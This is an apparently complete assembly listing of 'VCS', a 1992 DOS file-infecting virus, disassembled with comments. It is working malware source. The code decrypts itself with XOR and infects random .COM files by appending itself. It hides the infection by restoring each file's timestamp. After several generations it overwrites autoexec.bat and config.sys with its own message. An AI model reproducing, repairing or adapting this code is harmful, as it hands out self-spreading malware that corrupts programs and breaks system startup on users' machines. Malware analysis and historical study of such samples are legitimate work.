
PAGE  59,132

;
;								         
;			        VCS				         
;								         
;      Created:   6-Aug-92					         
;      Passes:    5	       Analysis Options on: QRS		         
;								         
;

data_1e		equ	9Ah			; (0000:009A=126h)
data_6e		equ	6Ch			; (0040:006C=0C35Eh)
psp_cmd_size	equ	80h			; (8846:0080=0)
data_12e	equ	535h			;*(8846:0535=0)
data_13e	equ	537h			;*(8846:0537=0)
data_14e	equ	59Ch			;*(8846:059C=0)
data_33e	equ	100h			;*(9846:0100=0)
data_34e	equ	533h			;*(9846:0533=0)

seg_a		segment	byte public
		assume	cs:seg_a, ds:seg_a


		org	100h

vcs		proc	far

start:
		call	sub_2			; (0117)

vcs		endp

;
;			       SUBROUTINE
;
;         Called from:	 8846:011D, 0288
;

sub_1		proc	near
		mov	cx,40Fh
		mov	ah,byte ptr ds:[52Fh][si]	; (8846:052F=0)
		lea	di,[si+120h]		; Load effective addr
		mov	si,di

locloop_1:					;  xref 8846:0114
		lodsb				; String [si] to al
		xor	al,ah
		stosb				; Store al to es:[di]
		loop	locloop_1		; Loop if cx > 0

		retn
sub_1		endp


;

;			       SUBROUTINE
;
;         Called from:	 8846:0100
;

sub_2		proc	near
		pop	si
		sub	si,103h
		push	si
		call	sub_1			; (0103)
		pop	si
		sub	ax,ax
		push	ax
		pop	es
		mov	ax,es:data_1e		; (0000:009A=126h)
		cmp	ax,1000h
		jae	loc_2			; Jump if above or =
		lea	dx,[si+587h]		; Load effective addr
		mov	ah,1Ah
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA(disk xfer area) ds:dx
		inc	byte ptr ds:[52Eh][si]	; (8846:052E=0)
		call	sub_6			; (019E)
		call	sub_3			; (0157)
loc_2:						;  xref 8846:012C
		push	ds
		pop	es
		mov	dx,psp_cmd_size		; (8846:0080=0)
		mov	ah,1Ah
		int	21h			; DOS Services  ah=function 1Ah
						;  set DTA(disk xfer area) ds:dx
		lea	si,[si+530h]		; Load effective addr
		mov	di,100h			; (8846:0100=0E8h)
		movsw				; Mov [si] to es:[di]
		movsw				; Mov [si] to es:[di]
		movsb				; Mov [si] to es:[di]
		db	 68h, 00h, 01h,0C3h

; External Entry into Subroutine 
;
;         Called from:	 8846:013D

sub_3:
		mov	al,byte ptr ds:[52Eh][si]	; (8846:052E=0)
		cmp	al,data_9[si]		; (8846:050F=6)
		jb	loc_ret_3		; Jump if below
		call	sub_4			; (0171)
		lea	dx,[si+30Eh]		; Load effective addr
		mov	ah,9
		int	21h			; DOS Services  ah=function 09h
						;  display char string at ds:dx
		mov	ah,0
		int	16h			; Keyboard i/o  ah=function 00h
						;  get keybd char in al, ah=scan

loc_ret_3:					;  xref 8846:015F
		retn

sub_2		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:0161
;

sub_4		proc	near
		lea	dx,[si+510h]		; Load effective addr
		call	sub_5			; (0180)
		lea	dx,[si+520h]		; Load effective addr
		call	sub_5			; (0180)
		retn
sub_4		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:0175, 017C
;

sub_5		proc	near
		xor	cx,cx			; Zero register
		mov	ah,3Ch			; '<'
		int	21h			; DOS Services  ah=function 3Ch
						;  create/truncate file @ ds:dx
		jc	loc_ret_4		; Jump if carry Set
		mov	bp,ax
		lea	dx,[si+30Eh]		; Load effective addr
		mov	cx,200h
		mov	bx,bp
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov	bx,bp
		mov	ah,3Eh			; '>'
		int	21h			; DOS Services  ah=function 3Eh
						;  close file, bx=file handle

loc_ret_4:					;  xref 8846:0186
		retn
sub_5		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:013A
;

sub_6		proc	near
		mov	cx,0Ah


locloop_5:					;  xref 8846:01A6
		push	cx
		call	sub_7			; (01A9)
		pop	cx
		loop	locloop_5		; Loop if cx > 0

		retn
sub_6		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:01A2
;

sub_7		proc	near
		mov	ax,40h
		mov	es,ax
		mov	word ptr ds:data_12e[si],0	; (8846:0535=0)
		test	byte ptr es:data_6e,7	; (0040:006C=81h)
		jz	loc_6			; Jump if zero
		mov	byte ptr ds:data_13e[si],5Ch	; (8846:0537=0) '\'
		inc	word ptr ds:data_12e[si]	; (8846:0535=0)
		call	sub_9			; (01E7)
loc_6:						;  xref 8846:01BA
		call	sub_10			; (0225)
		retn
sub_7		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:021B, 0258
;

sub_8		proc	near
		lea	bx,[si+5A5h]		; Load effective addr
		lea	di,[si+537h]		; Load effective addr
		add	di,ds:data_12e[si]	; (8846:0535=0)
loc_7:						;  xref 8846:01E4
		mov	al,[bx]
		inc	bx
		mov	[di],al
		inc	di
		inc	word ptr ds:data_12e[si]	; (8846:0535=0)
		or	al,al			; Zero ?
		jnz	loc_7			; Jump if not zero
		retn
sub_8		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:01C5

;

sub_9		proc	near
		lea	bx,[si+537h]		; Load effective addr
		mov	dx,bx
		add	bx,ds:data_12e[si]	; (8846:0535=0)
		mov	word ptr [bx],2E2Ah
		mov	word ptr [bx+2],2Ah
		mov	cx,10h
		mov	ah,4Eh			; 'N'
loc_8:						;  xref 8846:0219
		int	21h			; DOS Services  ah=function 4Fh
						;  find next filename match
		jc	loc_ret_11		; Jump if carry Set
		test	byte ptr ds:data_14e[si],10h	; (8846:059C=0)
		jz	loc_9			; Jump if zero
		ror	bp,1			; Rotate
		xor	bp,es:data_6e		; (0040:006C=0C38Eh)
		test	bp,0Fh
		jz	loc_10			; Jump if zero
loc_9:						;  xref 8846:0208
		mov	ah,4Fh			; 'O'
		jmp	short loc_8		; (01FF)
loc_10:						;  xref 8846:0215
		call	sub_8			; (01CC)
		mov	word ptr [di-1],5Ch

loc_ret_11:					;  xref 8846:0201
		retn
sub_9		endp


loc_ret_12:					;  xref 8846:0243
		retn

;
;			       SUBROUTINE
;
;         Called from:	 8846:01C8
;

sub_10		proc	near
		lea	bx,[si+537h]		; Load effective addr
		mov	dx,bx
		add	bx,ds:data_12e[si]	; (8846:0535=0)
		mov	word ptr [bx],2E2Ah
		mov	word ptr [bx+2],4F43h
		mov	word ptr [bx+4],4Dh
		xor	cx,cx			; Zero register
		mov	ah,4Eh			; 'N'
		int	21h			; DOS Services  ah=function 4Eh
						;  find 1st filenam match @ds:dx
		jc	loc_ret_12		; Jump if carry Set
loc_13:						;  xref 8846:0256
		ror	bp,1			; Rotate
		xor	bp,es:data_6e		; (0040:006C=0C396h)
		test	bp,0Fh

		jz	loc_14			; Jump if zero
		mov	ah,4Fh			; 'O'
		int	21h			; DOS Services  ah=function 4Fh
						;  find next filename match
		jnc	loc_13			; Jump if carry=0
loc_14:						;  xref 8846:0250
		call	sub_8			; (01CC)
		call	sub_11			; (025F)
		retn
sub_10		endp


;
;			       SUBROUTINE
;
;         Called from:	 8846:025B
;

sub_11		proc	near
		mov	ax,40h
		mov	es,ax
		mov	dl,es:data_6e		; (0040:006C=9Bh)
		or	dl,dl			; Zero ?
		jnz	loc_15			; Jump if not zero
		inc	dl
loc_15:						;  xref 8846:026B
		mov	ax,ds
		add	ax,1000h
		mov	es,ax
		mov	byte ptr ds:[52Fh][si],dl	; (8846:052F=0)
		push	si
		lea	di,[si+100h]		; Load effective addr
		mov	si,di
		mov	cx,435h
		rep	movsb			; Rep when cx >0 Mov [si] to es:[di]
		pop	si
		push	si
		call	sub_1			; (0103)
		pop	si
		lea	dx,[si+537h]		; Load effective addr
		mov	ax,3D02h
		int	21h			; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		jc	loc_17			; Jump if carry Set
		mov	bp,ax
		push	es
		pop	ds
		lea	dx,[si+530h]		; Load effective addr
		mov	cx,5
		mov	bx,bp
		mov	ah,3Fh			; '?'
		int	21h			; DOS Services  ah=function 3Fh
						;  read file, bx=file handle
						;   cx=bytes to ds:dx buffer
		mov	ax,ds:data_34e[si]	; (9846:0533=0)
		cmp	ax,0C350h
		je	loc_16			; Jump if equal

		mov	bx,bp
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		mov	ax,4202h
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, bx=file handle
						;   al=method, cx,dx=offset
		mov	di,ax
		add	di,100h
		mov	bx,bp
		mov	ax,5700h
		int	21h			; DOS Services  ah=function 57h
						;  get file date+time, bx=handle
						;   returns cx=time, dx=time
		push	cx
		push	dx
		lea	dx,[si+100h]		; Load effective addr
		mov	cx,435h
		mov	bx,bp
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov	bx,bp
		xor	cx,cx			; Zero register
		xor	dx,dx			; Zero register
		mov	ax,4200h
		int	21h			; DOS Services  ah=function 42h
						;  move file ptr, bx=file handle
						;   al=method, cx,dx=offset
		mov	bx,data_33e		; (9846:0100=0)
		mov	byte ptr [bx],0B8h
		mov	[bx+1],di
		mov	word ptr [bx+3],0C350h
		mov	dx,bx
		mov	cx,5
		mov	bx,bp
		mov	ah,40h			; '@'
		int	21h			; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		pop	dx
		pop	cx
		mov	bx,bp
		mov	ax,5701h
		int	21h			; DOS Services  ah=function 57h
						;  set file date+time, bx=handle
						;   cx=time, dx=time
loc_16:						;  xref 8846:02AF
		mov	bx,bp
		mov	ah,3Eh			; '>'
		int	21h			; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
loc_17:						;  xref 8846:0295
		push	cs
		pop	ds
		retn

sub_11		endp

		and	al,1Ah
		add	[bx+si],cl
		db	 6Dh,0DCh,0DEh,0F1h, 95h, 6Bh
		db	 4Bh,0F8h,0FEh, 8Ch, 10h, 42h
		db	 4Ah, 15h,0D3h, 2Fh, 50h,0F2h
		db	 9Ah, 1Bh,0CDh, 80h,0A1h, 59h
		db	 4Dh, 24h, 5Fh, 6Eh, 55h, 30h
		db	0D4h, 8Ch,0D3h,0F9h, 16h, 4Fh
		db	0C8h, 32h, 1Ch,0BCh, 34h, 8Ch
		db	0CAh, 78h, 44h, 91h, 3Eh, 46h
		db	0B8h,0BEh, 5Bh,0C5h, 98h,0E0h
		db	 95h, 68h, 19h,0B2h,0FCh,0B6h
		db	0CAh,0B6h, 8Dh,0C5h, 04h, 51h
		db	0B5h,0F2h, 91h, 2Ah, 27h,0E3h
		db	 9Ch,0C6h,0E1h,0C1h,0DBh, 5Dh
		db	 7Ah,0AFh,0F9h, 00h,0AFh, 8Fh
		db	 46h,0EFh, 2Eh,0F6h,0A3h, 35h
		db	0A3h, 6Dh,0A8h, 87h, 02h,0EBh
		db	 19h, 5Ch, 14h, 91h, 8Ah, 4Dh
		db	 45h,0A6h, 4Eh,0B0h,0ADh,0D4h
		db	0A6h, 71h, 5Eh,0A1h, 29h, 32h
		db	0EFh, 31h, 6Fh,0A4h, 46h, 3Ch
		db	 02h, 25h,0ABh, 4Bh, 88h, 9Ch
		db	 0Bh, 38h, 2Ah, 92h, 8Ah,0E5h
		db	 49h, 92h, 4Dh, 3Dh, 62h,0C4h
		db	 87h, 6Ah, 3Fh,0C5h,0C3h, 56h
		db	 60h,0CBh, 71h, 65h,0AAh,0F7h
		db	0B5h, 71h, 50h,0FAh, 6Ch, 07h
		db	0FFh,0EDh, 81h,0E2h, 4Fh, 6Bh
		db	 70h,0A6h, 67h,0F1h, 18h,0DFh
		db	0EFh, 78h,0C6h, 3Ah, 3Ch, 52h
		db	 80h, 03h,0B8h, 42h, 8Fh,0E0h
		db	 91h,0E0h, 51h,0CEh,0A3h, 2Dh
		db	 3Fh, 5Ah,0A8h, 72h, 3Bh, 21h
		db	 9Fh, 5Fh, 1Ch, 8Bh, 7Bh, 62h
		db	 7Dh,0C4h, 0Fh, 46h,0C2h,0FDh
		db	 36h, 0Eh, 6Dh,0E2h, 47h, 11h
		db	0A1h, 5Dh,0BAh, 57h,0F4h, 8Ah
		db	 14h, 34h, 7Bh,0FBh, 1Ah, 24h
		db	 11h, 2Eh, 34h,0E7h,0E8h, 4Ch
		db	 1Fh,0DDh, 54h, 25h,0D8h,0A5h
		db	0D4h, 6Ah,0C5h,0F2h, 62h, 2Bh
		db	 27h,0AFh,0FEh, 91h,0BEh, 54h
		db	 76h,0DEh
		db	0BBh, 88h, 78h,0A3h,0ECh,0F9h
		db	0DCh, 41h, 24h, 79h, 2Ch,0A3h
		db	0E9h, 5Bh, 75h, 3Ah, 63h, 0Dh
		db	 53h, 3Ah, 81h,0F7h, 38h, 15h
		db	 6Eh, 94h,0FDh, 37h, 34h,0D0h
		db	0ADh, 01h,0B0h,0A2h, 8Fh, 09h
		db	0B7h,0EBh, 73h, 91h, 88h, 8Eh
		db	 3Eh, 45h, 72h,0D2h,0B9h, 3Ah
		db	0C7h,0F6h, 97h, 25h, 02h, 13h
		db	0C6h,0D9h, 35h, 38h,0F9h, 05h
		db	0B6h,0C1h, 73h, 2Ch, 0Bh,0F8h

		db	 17h,0E6h, 13h,0F0h,0AEh
		db	56h
		db	 78h, 9Fh, 78h,0EDh, 52h, 3Bh
		db	0F7h, 5Eh, 1Eh,0D8h,0F9h,0E2h
		db	0DFh, 40h,0E4h
		db	0AFh, 93h, 13h, 47h,0B4h,0DAh
		db	 20h, 9Fh, 97h,0E3h, 04h
		db	68h
loc_20:
		db	0F1h, 98h, 02h, 65h,0CAh, 0Bh
		db	 23h, 31h, 51h
loc_21:
		and	word ptr ds:[0DE07h][bx],cx	; (8846:DE07=0)
		jle	$+2Dh			; Jump if < or =
		iret				; Interrupt return
		sub	dh,byte ptr ds:[6B75h][bx+di]	; (8846:6B75=0)
		into				; Int 4 on overflow
		mov	byte ptr ds:[419Dh],al	; (8846:419D=0)
		sti				; Enable interrupts
		cmp	ah,dh
		or	bh,[bx+di+51h]
		cmp	al,0DAh
		jcxz	loc_20			; Jump if cx=0
		pop	ss
;*		jno	loc_23			;*Jump if not overflw
		db	 71h, 22h
		pop	bx
		xchg	ax,cx
		retn	7729h
		db	0C4h,0C2h,0F0h, 00h, 67h, 74h
		db	0B4h, 10h,0A9h, 32h, 6Eh, 78h
		db	 4Eh, 3Fh, 92h, 6Ch, 09h, 8Bh
		db	 0Bh, 6Dh, 1Ah,0C6h, 74h, 7Ch
		db	 29h,0A9h, 99h
		db	 7Eh, 63h
loc_23:
		sub	byte ptr ds:[0D4EBh],0FFh	; (8846:D4EB=0)
		iret				; Interrupt return
		mov	sp,3D04h
		cmp	word ptr ds:[12D6h][si],dx	; (8846:12D6=0)
		db	0C8h, 2Eh, 9Eh, 97h, 33h, 08h
		db	 83h,0FAh, 84h, 4Fh, 15h, 83h
		db	 5Bh, 0Ch, 2Fh,0E6h, 65h, 8Dh
		db	 10h,0C9h, 17h, 16h,0B5h, 96h
		db	0B1h,0CAh, 7Bh, 84h, 71h,0D5h
		db	0F3h,0E1h, 14h,0DCh, 06h,0A3h
		db	 93h,0A8h, 4Ah, 2Fh, 1Dh, 0Fh
		db	0A5h, 6Ah, 51h, 24h, 21h,0FFh
		db	0BEh
		db	0A0h, 0Fh,0F0h, 9Eh, 90h, 61h
		db	 60h,0CFh, 41h, 42h,0A0h, 13h
		db	 6Ah,0F8h, 79h, 89h, 9Ah,0FCh
		db	0BAh, 6Dh,0E2h, 58h, 03h, 0Dh
		db	0C4h, 41h,0D2h
		db	 0Dh, 5Ch
data_9		db	6			; Data table (indexed access)
						;  xref 8846:015B

		db	'c:\autoexec.bat'
		db	0
		db	'c:\config.sys'
		db	0
data_10		db	0			; Data table (indexed access)
						;  xref 8846:0136, 0157
data_11		db	0			; Data table (indexed access)
						;  xref 8846:0106, 0276
		db	0C3h, 00h, 00h, 00h, 00h

seg_a		ends
		end	start
